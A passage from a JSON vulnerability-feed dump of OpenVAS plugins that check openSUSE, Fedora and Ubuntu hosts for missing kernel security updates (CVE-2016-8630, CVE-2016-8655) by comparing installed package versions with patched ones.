rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-debugsource\", rpm:\"hdjmod-debugsource~1.28~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default\", rpm:\"hdjmod-kmp-default~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default-debuginfo\", rpm:\"hdjmod-kmp-default-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pv\", rpm:\"hdjmod-kmp-pv~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pv-debuginfo\", rpm:\"hdjmod-kmp-pv-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen\", rpm:\"hdjmod-kmp-xen~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen-debuginfo\", rpm:\"hdjmod-kmp-xen-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset\", rpm:\"ipset~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debuginfo\", rpm:\"ipset-debuginfo~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debugsource\", rpm:\"ipset-debugsource~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-devel\", rpm:\"ipset-devel~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default\", rpm:\"ipset-kmp-default~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default-debuginfo\", rpm:\"ipset-kmp-default-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pv\", rpm:\"ipset-kmp-pv~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pv-debuginfo\", rpm:\"ipset-kmp-pv-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen\", rpm:\"ipset-kmp-xen~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen-debuginfo\", rpm:\"ipset-kmp-xen-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3\", rpm:\"libipset3~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3-debuginfo\", rpm:\"libipset3-debuginfo~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock\", rpm:\"pcfclock~0.44~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debuginfo\", rpm:\"pcfclock-debuginfo~0.44~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debugsource\", rpm:\"pcfclock-debugsource~0.44~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default-debuginfo\", rpm:\"pcfclock-kmp-default-debuginfo~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pv\", rpm:\"pcfclock-kmp-pv~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pv-debuginfo\", rpm:\"pcfclock-kmp-pv-debuginfo~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-debugsource\", rpm:\"vhba-kmp-debugsource~20140928~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default\", rpm:\"vhba-kmp-default~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-debuginfo\", rpm:\"vhba-kmp-default-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pv\", rpm:\"vhba-kmp-pv~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pv-debuginfo\", rpm:\"vhba-kmp-pv-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen\", rpm:\"vhba-kmp-xen~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-debuginfo\", rpm:\"vhba-kmp-xen-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd\", rpm:\"drbd~8.4.6~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-debugsource\", rpm:\"drbd-debugsource~8.4.6~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-default\", rpm:\"drbd-kmp-default~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-default-debuginfo\", rpm:\"drbd-kmp-default-debuginfo~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-pv\", rpm:\"drbd-kmp-pv~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-pv-debuginfo\", rpm:\"drbd-kmp-pv-debuginfo~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-xen\", rpm:\"drbd-kmp-xen~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-xen-debuginfo\", rpm:\"drbd-kmp-xen-debuginfo~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules\", rpm:\"lttng-modules~2.7.0~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-debugsource\", rpm:\"lttng-modules-debugsource~2.7.0~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-default\", rpm:\"lttng-modules-kmp-default~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-default-debuginfo\", rpm:\"lttng-modules-kmp-default-debuginfo~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-pv\", rpm:\"lttng-modules-kmp-pv~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-pv-debuginfo\", rpm:\"lttng-modules-kmp-pv-debuginfo~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae\", rpm:\"hdjmod-kmp-pae~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae-debuginfo\", rpm:\"hdjmod-kmp-pae-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae\", rpm:\"ipset-kmp-pae~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae-debuginfo\", rpm:\"ipset-kmp-pae-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae\", rpm:\"pcfclock-kmp-pae~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae-debuginfo\", rpm:\"pcfclock-kmp-pae-debuginfo~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae\", rpm:\"vhba-kmp-pae~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-debuginfo\", rpm:\"vhba-kmp-pae-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8630"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810127", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-14c4187e3a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-14c4187e3a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810127\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:04:28 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8630\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-14c4187e3a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-14c4187e3a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A3WA5MYDRY3QJVY6IVR26CQWNLKQRBYB\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.7~200.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8630"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-07T00:00:00", "id": "OPENVAS:1361412562310871927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871927", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-876deae183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-876deae183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871927\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:20:29 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-8630\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-876deae183\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-876deae183\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PK5IJ4CPHNMANKL4YU4JWFENHMEBSJF5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.7~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842980", "type": "openvas", "title": "Ubuntu Update for linux USN-3149-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3149-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842980\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:43 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3149-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3149-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3149-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-generic\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-generic-lpae\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-lowlatency\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc-e500\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc-e500mc\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc-smp\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc64-emb\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc64-smp\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": 